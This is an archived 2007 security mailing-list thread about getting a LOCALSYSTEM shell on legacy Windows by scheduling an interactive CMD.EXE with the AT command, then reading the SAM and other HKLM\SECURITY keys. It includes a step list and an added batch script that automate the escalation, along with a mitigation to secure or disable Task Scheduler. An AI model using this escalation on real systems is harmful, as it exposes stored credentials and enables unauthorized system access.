RE: Help with Exploit

Harlan, et al

To access the security regkeys in HKLM you don't need to change the ACLs.

This is an age-old (well, since early NT4 anyway) trick to get LOCALSYSTEM
privs on anything that allows you to run an AT job:

. Get the current time.
. From CMD line run "AT <time+1 minute> /interactive CMD.EXE".
. Wait for a minute.
. CMD window opens in LOCALSYSTEM context.
. Run REGEDIT from new CMD window.
. Navigate to HKLM\SECURITY.
. Marvel at now visible security keys: Cache, Policy, RXACT, SAM.

This particular trick is the basis for a good deal of trivial priv escalation
attacks on Windows, so if you can, you should secure the Task Scheduler with
a non-priv'ed user or disable it. Another good reason for not giving users
local admin rights.



James D. Stallard, MIoD
Microsoft and Networks Infrastructure Technical Architect
Skype: JamesDStallard
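The six steps above, scripted as a batch file. This is an added example, not code from James's post: it computes the next whole minute from %TIME%, shows that the current (administrator, non-SYSTEM) shell cannot read HKLM\SECURITY, then submits the AT job. It assumes a pre-Vista Windows (NT4/2000/XP/2003) where AT /INTERACTIVE still puts the window on the console desktop, a running Task Scheduler service, and a caller allowed to submit AT jobs (administrators by default).

```batch
@echo off
setlocal
rem Added example (not from the original post): schedule an interactive
rem CMD.EXE one minute from now through the legacy AT service, then show
rem why it matters by reading HKLM\SECURITY from the current shell first.

rem %TIME% looks like " 9:05:07.12" or "14:40:07.12" (locale dependent);
rem only the hour and minute fields are needed.
for /f "tokens=1,2 delims=:" %%a in ("%TIME%") do (
    set "HH=%%a"
    set "MM=%%b"
)

rem Strip the leading space/zero so SET /A does not treat 08 and 09 as octal.
set "HH=%HH: =%"
if "%HH:~0,1%"=="0" set "HH=%HH:~1%"
if "%MM:~0,1%"=="0" set "MM=%MM:~1%"

rem Add one minute with carry into the hour and wrap at midnight.
set /a MM+=1
if %MM% geq 60 (
    set /a MM-=60
    set /a HH+=1
)
if %HH% geq 24 set /a HH-=24

rem AT wants HH:MM in 24-hour form; pad both fields back to two digits.
if %HH% lss 10 set "HH=0%HH%"
if %MM% lss 10 set "MM=0%MM%"
set "WHEN=%HH%:%MM%"

echo From this (non-SYSTEM) shell, HKLM\SECURITY is not readable:
reg query HKLM\SECURITY

echo Scheduling an interactive SYSTEM shell for %WHEN% ...
at %WHEN% /interactive cmd.exe
if errorlevel 1 (
    echo AT failed: the Task Scheduler service is stopped or you may not submit jobs.
    endlocal
    exit /b 1
)

echo Wait for the new CMD window, then run:  reg query HKLM\SECURITY
echo (or open REGEDIT) and the Cache, Policy, RXACT and SAM subkeys are listed.
endlocal
```

The `reg query` before and after the job is the quickest check that the new window really is running as LOCALSYSTEM rather than as a second copy of your own shell. Two caveats for anyone reading this on a newer box: from Vista onward services run in Session 0, so an AT /INTERACTIVE window is no longer shown on the logged-on user's desktop, and AT.EXE itself is deprecated in favour of SCHTASKS.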

-----Original Message-----
From: listbounce@xxxxxxxxxxxxxxxxx [mailto:listbounce@xxxxxxxxxxxxxxxxx] On
Behalf Of Harlan Carvey
Sent: 17 April 2007 14:40
To: Nicolas RUFF; Murda Mcloud; 'Vic Brown'
Cc: focus-ms@xxxxxxxxxxxxxxxxx
Subject: Re: Help with Exploit

I've done some googling and am finding that the new RR version checks the
security hive (which I believe to be 'invisible' to regedit - can someone
correct me if I'm wrong?).

On a live system, the Security hive is not accessible by default. You need
to change the ACLs so that the Admin has the ability to read the hive.

I know I am coming late on this one, but registry keys that contain
NULL characters cannot be accessed through REGEDIT. You have to rely
on the low-level NTDLL API to access them. It is a known "copy
protection" trick :)


Harlan Carvey, CISSP
author: "Windows Forensic Analysis"
